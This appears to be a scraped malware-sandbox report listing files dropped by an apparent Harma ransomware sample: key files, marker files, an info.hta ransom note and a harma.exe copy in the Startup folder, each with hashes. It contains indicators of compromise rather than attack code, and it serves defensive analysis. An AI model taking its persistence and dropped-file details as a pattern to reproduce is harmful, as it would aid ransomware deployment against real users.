082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\ProgramData\id.harma
Filesize
8B

MD5
69853ad62d7f47c9199d94538f0786b9

SHA1
b37076c8805dbbaf9663d5ee887f530c95ecc26c

SHA256
031c4ea40cc5d4e42bdac1387816fac4d1af1ac4044ff8169634c1a3f185171c

SHA512
0dad2eca7f32c3ca184ccff9c5d7912cb695b05e1170e42997537b849fb98b3bac522edec09c32ce76ed84a7d66ca451179c2431f9ee749377eef87fc8d242d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPRIV
Filesize
2KB

MD5
1957b0a95c68b57b56d1951399164568

SHA1
a79624a7b25808685907f09f139a8c490e432f08

SHA256
c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973

SHA512
7efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPUB
Filesize
292B

MD5
d72ed62e6d972ceb042a10a0378cb37f

SHA1
ba5d96c45f78de85ddf51cf6041320605cb7077a

SHA256
4ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6

SHA512
6ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\id.harma
Filesize
8B

MD5
69853ad62d7f47c9199d94538f0786b9

SHA1
b37076c8805dbbaf9663d5ee887f530c95ecc26c

SHA256
031c4ea40cc5d4e42bdac1387816fac4d1af1ac4044ff8169634c1a3f185171c

SHA512
0dad2eca7f32c3ca184ccff9c5d7912cb695b05e1170e42997537b849fb98b3bac522edec09c32ce76ed84a7d66ca451179c2431f9ee749377eef87fc8d242d9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe
Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\Users\Admin\Desktop\HRMPRIV
Filesize
2KB

MD5
1957b0a95c68b57b56d1951399164568

SHA1
a79624a7b25808685907f09f139a8c490e432f08

SHA256
c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973

SHA512
7efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92

Download Submit
C:\info.hta
Filesize
12KB

MD5
58974f5eae5f6f7b8526f8d062f199a4

SHA1
c60d299024d56b21366c410840a2600871367684

SHA256
7175bc58942b269c629379180941f5633f1b237c9181601c193d5f3bc7ce3aa1

SHA512
794683e2592049616eb12512280e7e0760ca0a222f8e80aa83501e31c4b335f6ec1ec8865c2142c7ca16453b6e0a5c3218b75dd7bf598789a4d1720077cf923d

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads